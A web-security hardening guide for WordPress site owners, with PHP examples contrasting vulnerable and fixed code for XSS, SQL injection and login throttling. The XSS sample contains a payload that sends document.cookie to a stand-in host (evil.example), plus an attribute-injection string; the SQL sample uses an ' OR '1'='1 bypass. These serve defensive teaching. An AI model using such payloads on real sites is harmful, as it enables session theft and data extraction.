Defacement
A website is the front door and the face of your organization. Many attackers deface an organization by compromising its website and posting their own message on it. (Some well-known victims: MIT, NASA, eBay, PayPal, Mossad, Forbes, WikiLeaks, Oracle, Russia Today.)
DDoS
Attackers often use a Distributed Denial of Service (DDoS) attack to overwhelm a web server with requests until the site goes down. This can hurt the owner financially, especially if the website generates revenue. (Examples of websites taken down by DDoS attacks: Netflix, Amazon, Twitter, Spotify, GitHub, Xbox Live.)
Fortunately, Cloudflare's free plan includes DDoS protection and sits in front of a WordPress site with no code changes, which is a good place to start.
OWASP
The Open Web Application Security Project (OWASP) is a not-for-profit organization that publishes a Top 10 list of the most common security flaws in web applications along with mitigation techniques.
The list is an excellent resource for hardening your website or web application. We highly recommend going over it.
HTTPS
This is an easy, must-have feature. Encrypting the traffic between the browser and the web server is critical to thwart Man-in-the-Middle attacks.
Chrome now marks ALL websites without https as "not secure"!
With free certificates like Let's Encrypt, there really isn't any excuse not to have TLS encryption (HTTPS) enabled. WordPress makes it easy with a plugin.
XSS
This is the most commonly reported vulnerability in WordPress plugins.
Cross-Site Scripting is when an attacker injects malicious JavaScript through the input fields of your website so that it runs in other users' browsers. It can be used to show fake popups with download links or "call this number" alerts (social engineering), redirect visitors to a phishing page, or steal session cookies and other data from logged-in users. With a stolen session cookie the attacker can act as that user without ever knowing the password.
Validating input on the way in and escaping output on the way out (in WordPress, with functions such as esc_html(), esc_attr() and esc_url()) is the standard mitigation.
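As an added illustration (this code is not from the original post), here is a reflected search box in plain PHP, first vulnerable and then escaped for both the HTML text and the HTML attribute context. The attacker payload and the render* function names are made up for the example; the WordPress functions named in the comments are real but are not called, so the file runs stand-alone with `php xss.php`.

```php
<?php
// Added example: a search page that reflects user input back to the browser.
// Plain PHP, no WordPress install needed. The WordPress equivalents are named in
// comments only.

// Constructed attacker input: the classic session-cookie theft payload.
$userInput = '<script>fetch("https://evil.example/?c=" + document.cookie)</script>';

// VULNERABLE: the raw value is written into the page, so the <script> tag reaches
// the browser unchanged and executes in the context of whoever views the page.
function renderSearchVulnerable(string $q): string {
    return '<p>Results for: ' . $q . '</p>';
}

// HARDENED (text context): encode <, >, &, " and ' so the payload is inert text.
// In WordPress use esc_html(); htmlspecialchars() is the plain-PHP equivalent.
function renderSearchSafe(string $q): string {
    return '<p>Results for: ' . htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '</p>';
}

// HARDENED (attribute context): a double quote would otherwise close value="..."
// and let the attacker add an event handler. In WordPress use esc_attr().
function renderInputSafe(string $q): string {
    return '<input type="text" name="s" value="'
        . htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8') . '">';
}

// Sanitizing on input is a second layer (WordPress: sanitize_text_field()); it
// does not replace output escaping, because the same value may later be rendered
// in a context the input filter never anticipated.
function sanitizeSearchTerm(string $q): string {
    $q = strip_tags($q);
    return trim(preg_replace('/[\x00-\x1F\x7F]/', '', $q));
}

// Quick self-check: does the rendered HTML still carry an executable <script> tag?
function containsScriptTag(string $html): bool {
    return stripos($html, '<script') !== false;
}

echo renderSearchVulnerable($userInput), PHP_EOL;
echo renderSearchSafe($userInput), PHP_EOL;
echo renderInputSafe('" onfocus="alert(document.cookie)'), PHP_EOL;
echo renderSearchSafe(sanitizeSearchTerm($userInput)), PHP_EOL;
echo 'vulnerable output has live script tag: ',
    containsScriptTag(renderSearchVulnerable($userInput)) ? 'yes' : 'no', PHP_EOL;
echo 'escaped output has live script tag:    ',
    containsScriptTag(renderSearchSafe($userInput)) ? 'yes' : 'no', PHP_EOL;
```

The rule the example follows is "sanitize early, escape late": clean the value once when it arrives, then escape it every time it is rendered, using the function that matches where it lands (text node, attribute, URL, JavaScript). Escaping with the wrong context function, for example esc_html() inside an attribute, is one of the most common ways a plugin stays exploitable after a "fix".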
SQL Injection
SQL Injection consistently sits at or near the top of the OWASP list. This is where an attacker types SQL fragments into a web page's input fields so that they become part of the query and extract (or modify) data in the database. Watch the interactive demo linked here to understand it better.
Input validation helps, but the reliable fix is to keep user data out of the SQL text altogether with parameterized queries (prepared statements; in WordPress, $wpdb->prepare()).
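As an added example (not from the original post), the same user lookup written two ways against an in-memory SQLite database, so it runs offline with `php sqli.php`. The table, the rows and the attacker payload are constructed for the example; PDO is used because it works without WordPress, and the comments name the $wpdb equivalent a plugin would use.

```php
<?php
// Added example: string-built SQL beside a prepared statement.
// Requires PHP with the pdo_sqlite extension (present in most default builds).

$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE users (id INTEGER PRIMARY KEY, email TEXT, role TEXT)');
// Constructed sample rows. The apostrophe in o'brien is doubled because this
// literal is SQL text; user input never gets this treatment in the safe version.
$db->exec("INSERT INTO users (email, role) VALUES
    ('alice@example.com', 'admin'),
    ('bob@example.com', 'subscriber'),
    ('o''brien@example.com', 'editor')");

// VULNERABLE: the form field is concatenated straight into the statement, so
// the database cannot tell where the query ends and the user's text begins.
function findUserVulnerable(PDO $db, string $email): array {
    $sql = "SELECT id, email, role FROM users WHERE email = '" . $email . "'";
    return $db->query($sql)->fetchAll(PDO::FETCH_ASSOC);
}

// HARDENED: the value travels as a bound parameter and is only ever compared as
// data. In WordPress: $wpdb->get_results($wpdb->prepare(
//     "SELECT id, user_email FROM {$wpdb->users} WHERE user_email = %s", $email));
function findUserSafe(PDO $db, string $email): array {
    $stmt = $db->prepare('SELECT id, email, role FROM users WHERE email = :email');
    $stmt->execute([':email' => $email]);
    return $stmt->fetchAll(PDO::FETCH_ASSOC);
}

// Input validation is worth having as an extra layer (reject obviously bad data
// early), but it is not the control that stops injection; the prepared statement is.
function isPlausibleEmail(string $email): bool {
    return filter_var($email, FILTER_VALIDATE_EMAIL) !== false;
}

// Constructed attacker input for the "email" field. Concatenated, the WHERE clause
// becomes: email = '' OR '1'='1', which is true for every row.
$payload = "' OR '1'='1";

echo "Vulnerable query with attacker input:\n";
print_r(findUserVulnerable($db, $payload));

echo "Prepared statement with the same input (the payload is just a string):\n";
print_r(findUserSafe($db, $payload));

echo "Prepared statement with a legitimate address:\n";
print_r(findUserSafe($db, 'bob@example.com'));

// A legitimate apostrophe shows why "strip the quotes" is the wrong fix: the
// string-built query breaks on valid data, the prepared one handles it.
try {
    findUserVulnerable($db, "o'brien@example.com");
} catch (PDOException $e) {
    echo "Vulnerable query fails on a real address: ", $e->getMessage(), "\n";
}
print_r(findUserSafe($db, "o'brien@example.com"));

echo "Validation verdicts: payload=", isPlausibleEmail($payload) ? 'accept' : 'reject',
     ", o'brien=", isPlausibleEmail("o'brien@example.com") ? 'accept' : 'reject', "\n";
```

Two practical notes for WordPress plugin code: $wpdb->prepare() only protects values, so table names, column names and ORDER BY directions still have to come from an allow-list in your own code, and $wpdb->query() with a hand-built string is exactly the vulnerable pattern above no matter how the input was "validated" earlier.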
Login
Attackers routinely brute-force usernames and passwords against the backend login page of your website.
Do not use Admin, Administrator, or any employee's name as a username; attackers try all of them in the hope that one is right. Worse, if you run a plugin that locks a username after three or more failed attempts, an attacker who guesses the username can lock your own administrator out of the site.
- Pick a random or uncommon username.
- It goes without saying, passwords should be long and random (use a password manager).
- Use multi-factor authentication.
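As an added example (not from the original post), here is a small failed-login throttle that shows the lockout problem described above and one keying scheme that avoids it. It is plain PHP 8 with an in-memory store and runs with `php throttle.php`; the class and method names and the scenario IPs are made up for the example. In a WordPress plugin the same counters would be kept in transients and fed from the wp_login_failed action, which is assumed rather than shown.

```php
<?php
// Added example: why locking on the username alone is a self-inflicted denial of
// service, and what keying the counter on source IP + username changes.

final class LoginThrottle
{
    /** @var array<string, array{0:int,1:int}> key => [failure count, first failure time] */
    private array $failures = [];

    public function __construct(
        private int $maxAttempts = 5,
        private int $windowSeconds = 900,
        private bool $keyByUsernameOnly = false,
    ) {}

    // Weak scheme: every failure, from anyone, counts against the username.
    // Stronger scheme: the counter belongs to the (source IP, username) pair,
    // so an attacker's noise does not lock the real owner out.
    private function key(string $username, string $ip): string {
        $u = strtolower($username);
        return $this->keyByUsernameOnly ? $u : $ip . '|' . $u;
    }

    public function recordFailure(string $username, string $ip, int $now): void {
        $k = $this->key($username, $ip);
        // Start a fresh window if there is none or the old one has expired.
        if (!isset($this->failures[$k]) || $now - $this->failures[$k][1] > $this->windowSeconds) {
            $this->failures[$k] = [0, $now];
        }
        $this->failures[$k][0]++;
    }

    public function isLocked(string $username, string $ip, int $now): bool {
        $k = $this->key($username, $ip);
        if (!isset($this->failures[$k])) {
            return false;
        }
        [$count, $since] = $this->failures[$k];
        return $count >= $this->maxAttempts && ($now - $since) <= $this->windowSeconds;
    }

    // Call on successful login so a stale counter does not linger.
    public function reset(string $username, string $ip): void {
        unset($this->failures[$this->key($username, $ip)]);
    }
}

// Constructed scenario: an attacker at 203.0.113.7 hammers the "admin" account for
// twenty attempts; then the legitimate administrator at 198.51.100.20 tries to log in.
$attackerIp = '203.0.113.7';
$adminIp    = '198.51.100.20';

foreach (['username only' => true, 'ip + username' => false] as $label => $byUser) {
    $t = new LoginThrottle(maxAttempts: 5, windowSeconds: 900, keyByUsernameOnly: $byUser);
    for ($i = 0; $i < 20; $i++) {
        $t->recordFailure('admin', $attackerIp, 1000 + $i);
    }
    printf("%-14s attacker locked: %-3s real admin locked: %s\n",
        $label,
        $t->isLocked('admin', $attackerIp, 1030) ? 'yes' : 'no',
        $t->isLocked('admin', $adminIp, 1030) ? 'yes' : 'no');
}
```

Keying on the source address is not a complete answer either: an attacker who rotates IPs (the next section) gets a fresh counter each time, which is why the other items on the list, an uncommon username, a long random password and multi-factor authentication, still matter. A softer variant that is harder to weaponize against yourself is to add an increasing delay per failure rather than a hard lock.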
Block Countries
Sometimes blocking individual IP addresses from attacking your site doesn't have much of an effect, because the attacker keeps changing their IP.
I get a lot of login attempts on my backend from random countries in quick succession. Since my target audience is primarily North America, I simply block entire offending countries from accessing my website by placing them in a black list. This solves the problem by and large.
For WordPress users, "IP Geo Block" does a good job at this. It is a quick and dirty way to keep certain bots out. A seasoned foreign attacker can, and most likely will, use a US-based VPN to get around it if you really are a target.
Updates
Plugins add a lot of functionality to a website, but they are also where most of its vulnerabilities come from.
- Always update all plugins immediately. Updates frequently contain security patches.
- Only install plugins that are updated frequently and have a lot of downloads. Ignore the ones with only a few thousand downloads. It will save you time in the long run if their development is abandoned.
Vulnerability Assessment
With all the safeguards in place, a vulnerability assessment will always add value. It will show you what you missed and the level of risk involved. There are plenty of automated tools for this, but attackers are mostly human, and a human auditing your website will always find things the tools do not. Use tools for what they are: tools.